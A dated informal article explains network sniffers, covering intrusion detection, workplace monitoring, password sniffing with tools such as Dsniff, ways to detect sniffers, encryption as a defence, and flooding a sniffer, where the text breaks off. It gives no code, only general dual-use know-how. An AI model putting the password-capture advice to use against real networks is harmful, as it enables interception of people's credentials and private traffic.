|Copyright © 2001,2002 eyeonsecurity
Inc., All Rights Reserved. No portions of eyeonsecurity
may be used without express, written permission
Sniffers - Their (ab)use in Networks.|
- Obscure^, Eye on Security
I am writing this after an overdose
of MediNight (which in case you don't know, is
the medicine or choice /w alcohol, and alcohol
is evil), so please understand that my mental
health is not at its best.
This text is about sniffers, the
good and the evil uses, which I'll hope you will
find usefull and easy to comprehend. Please note
that this is not intended for the network experts
out there i.e. nothing new is said. However it
assumes you're familiar with certain TCP/IP terms.
Definition of a sniffer.
In networking terms, a sniffer
defines a machine which has its network interface
card set to promiscuous mode, thus watching over
any packet on the same switch. In normal mode,
a network card will accept only those packets
addressed to its MAC address. However when the
network card is in promiscuous mode, it will accept
all of the packets, and pass them to the OS. This
is usefull for monotoring a network, detecting
malicious packets, capturing passwords, and many
more. In fact, a sniffer is used by crackers,
hackers, and by security professionals for different
NIDS = network Intrusion Detection
System. This consists of a program which sets
the network card in promiscuous mode, and checks
for interesting packets. This will check for hacker
attacks such as NT Null Sessions, failed TELNET
authentication and even PINGs, amongst others.
One such free tool for Linux (and now even WinNT/2k)
is Snort. Snort is given a list of patterns it
should check for, log and alert the user/administrator.
NIDS are there to accompany firewalls as firewalls,
like any other software implementations, have
limitations, and can be circumvented. Thus once
an attacker has cracked the firewall, if he does
anything which produces a pattern defined in the
Intrusion Detection System, will probably face
some new problems :)
This is used by employers wishing
to watch over whatever their empoyees or School
administrators watching over their student's use
of internet (or vice-versa, that would be interesting).
Therefore they should know if you're watching
porn from school or not. One such product for
WinNT is Languard, which gives you all connections
other machines on the same network switch are
doing. It also allows the Administrator running
Languard, to filter certain sites, keywords, or
protocols. With the recent controversial FBI Carnivore
software, we also got an alternative implementation
of the evil software: Antivore. This monitors
e-mail, tracks a suspect's IP address and basically
sniffs all data of the suspect.
Password Sniffing and other malicious uses.
Sniffing passwords is probably
what you're after. This basically consists of
capturing only the first few bytes of every telnet,
ftp (or whatever protocol) session. A huge number
of programs exist to do this for all platforms.
Dsniff (available for linux and WinNT) does this
and more. It even allows you to synchronise with
another user on the network and browse websites
as he is doing so in realtime. Sniffers can be
a real headache for the (maybe lazy) system administrator,
as once just one machine is compromised on a network,
all data going and outgoing the network can be
captured. Thus e-mail, clear text passwords (such
as telnet or ftp), Netbios, and many more, can
be compromised easily.
TCPDump use to be, and prbably
still is, the sniffer of choice. It allows the
user to dump all Network Data in its roaw format.
It is usually used to check on certain connections,
what data is passing on a certain protocol and
other general use. I personally use Snort for
general use (besides using it as an IDS), as it
by default decodes the packet data. Other sniffers
(network protocol analyzer), are Ethereal (for
Linux/UNIX, port also available for WinNT) and
eEye's IRIS (commercial product). These two are
easy to use sniffers and will help you learn a
lot on your network traffic. WinNT Server also
comes with it's built-in sniffer: Network Monitor.
A relatively "new" implementation of
sniffers is to make passive network mapping and
OS detection. A good product which does this (available
for Linux and Windows platforms) is Siphon 0.666.
If you want to be sure that no
sniffers are running on your network, there actually
is software which checks for this. AntiSniff by
L0pht comes to mind. Other software which I know
that check for this are Sentinel (for linux) and
Languard. One of the ways these work is by sending
Machine A an ARP packet directed to a machine
B which does not exist, thus if Machine A is capturing
all packets (i.e. is in promiscuous mode), it
should respond to this packet, when it's not supposed
Other than that, it is recommended
that Network Administrators use encryption on
their networks, thus makeing sniffing (maybe by
inside users, i.e. employees wishing to blackmail
their boss for example >:) more or less useless.
Thus for instance, instead or using TELNET, use
Secure Shell (SSH).
If you actually want to attack
a sniffer, say which is running as an IDS or Monitor,
you can simply flood it with packets. A port scan
should in theory break up most